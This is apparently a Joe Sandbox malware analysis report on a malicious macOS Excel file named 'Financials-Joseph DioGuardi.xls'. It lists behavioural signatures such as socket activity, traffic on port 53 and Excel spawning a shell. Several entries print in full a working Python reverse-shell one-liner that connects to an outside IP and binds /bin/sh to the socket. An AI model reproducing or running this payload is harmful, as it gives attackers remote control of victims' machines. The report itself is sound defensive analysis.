Analysis Report

Overview

General Information

Joe Sandbox Version:	18.0.0
Analysis ID:	32722
Start time:	10:07:33
Joe Sandbox Product:	Cloud
Start date:	06.02.2017
Overall analysis duration:	0h 11m 54s
Report type:	full
Sample file name:	Financials-Joseph DioGuardi.xls
Cookbook file name:	default.jbs
Analysis system description:	Mac Mini, El Capitan 10.11.6 (Java 1.8.0_25)
Detection:	MAL
Classification:	mal72.evad.expl.troj.macXLS@0/51@0/0

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	72	0 - 100	Report FP / FN

Classification

Signature Overview

Click to jump to signature section

Networking:

Reads from file descriptors related to (network) sockets

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Reads from socket in process:
Source: /bin/sh (PID: 513)	Reads from socket in process:
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Reads from socket in process:

Writes from file descriptors related to (network) sockets

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Writes from socket in process:
Source: /bin/sh (PID: 513)	Writes from socket in process:
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Writes from socket in process:

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.0.50:5353 -> 224.0.0.251:5353

Detected non-DNS traffic on DNS port

Show sources

Source: global traffic

TCP traffic: 192.168.0.50:49225 -> 192.241.191.104:53

Remote Access Functionality:

Creates a reverse shell via Python

Show sources

Source: /bin/sh	Python command: sh -c python -c 'import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) ' &
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python	Python command: python -c import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python	Python command: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -c import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])

Persistence and Installation Behavior:

Reads data from the local random generator

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Random device file read: /dev/random
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Random device file read: /dev/urandom
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Random device file read: /dev/random
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Random device file read: /dev/random
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Random device file read: /dev/random
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 512)	Random device file read: /dev/urandom
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Random device file read: /dev/random
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Random device file read: /dev/random
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Random device file read: /dev/urandom
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Random device file read: /dev/random

Uses AppleKeyboardLayouts bundle containing keyboard layouts

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Uses the Python framework

Show sources

Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 512)

Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python

Writes property list (.plist) files to disk

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	Binary plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Excel/TemporaryItems/(A Document Being Saved By Excel)/ci.plist
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	XML plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Excel/TemporaryItems/(A Document Being Saved By Excel)/com.microsoft.officeprefs.plist
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	XML plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Excel/TemporaryItems/(A Document Being Saved By Excel)/com.microsoft.Excel.securebookmarks.plist
Source: /Applications/Microsoft Excel.app/Contents/SharedSupport/Office365ServiceV2.app/Contents/MacOS/Office365ServiceV2 (PID: 506)	Binary plist file created: /private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/T/com.microsoft.Office365ServiceV2/TemporaryItems/(A Document Being Saved By Office365ServiceV2)/ci.plist

Executes commands using a shell command-line interpreter

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 511)

Shell command executed: sh -c python -c 'import urllib2,socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.241.191.104',53)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) ' &

Uses AppleScript framework/components containing Apple Script related functionalities

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist

Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 502)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist

Office spawns shell processes

Show sources

Source: /Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel (PID: 511)

Office executable: /bin/sh

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal72.evad.expl.troj.macXLS@0/51@0/0

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources